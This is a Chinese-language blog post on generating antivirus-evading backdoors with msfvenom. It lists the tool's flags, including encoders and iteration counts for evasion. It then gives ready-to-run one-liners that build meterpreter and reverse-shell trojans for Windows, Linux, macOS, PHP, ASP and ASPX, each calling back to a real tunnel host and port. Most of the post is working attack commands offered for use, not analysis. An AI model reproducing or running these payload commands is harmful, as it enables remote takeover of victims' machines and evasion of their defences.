【后门攻击】后门生成模块免杀

从后面生成模块到权限维持基本命令

  • 命令参数解释

    • -p、-payload 指定payload

    • –list payloads 列出可以设置的payload选项

    • -l、-list 列出可用项

    • -n 指定nop在payload的数量

    • -f 指定文件输出格式

    • –list formats 列出可用输出格式

    • e、-encoder 指定使用编码器

    • –list encoders 查看可用的编码器

    • -a,–arch 指定目标系统架构

    • –platform 指定目标系统

    • –list platform 查看可用的目标系统

    • -s 未经编码的payload的最大长度

    • –encoder-space 编码后的payload最大长度

    • -b 设置在paylaod中避免出现的字符

    • -i 设置payload的编码次数

    • -c 、–add-code 包含额外的win32 shellcode文件

    • -x、–template 指定特定可执行文件作为模板

    • -k、–keep 保护模板的功能、注入的payload作为 一个新的进程运行

    • -o 保存paylaod到文件

    • -v 指定变量名

ad39402345.wicp.vip:26240

常见后门生成方式

  • 一、windows

    • 命令:msfvenom -a x64 –platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f exe -o 木马名称.exe

    • msfvenom -a x64 –platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -e x86/shikata_ga_nai -i 3 -f exe -o 木马名称.exe

  • 二、Linux

    • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f elf -o 木马名称.elf

  • 三、MAC

    • msfvenom -p osx/x86/shell_reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f macho -o 木马名称.macho

  • 四、PHP

    • msfvenom -p php/x86/meterpreter_reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f raw -o 木马名称.php

  • 五、ASP

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f asp -o 木马名称.asp

  • 六、ASPX

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10030 -f aspx -o 木马名称.aspx

本文标题:【后门攻击】后门生成模块免杀

文章作者:孤桜懶契

发布时间:2021年06月23日 - 09:27:32

最后更新:2021年10月20日 - 13:13:07

原始链接:https://gylq.gitee.io/posts/34.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------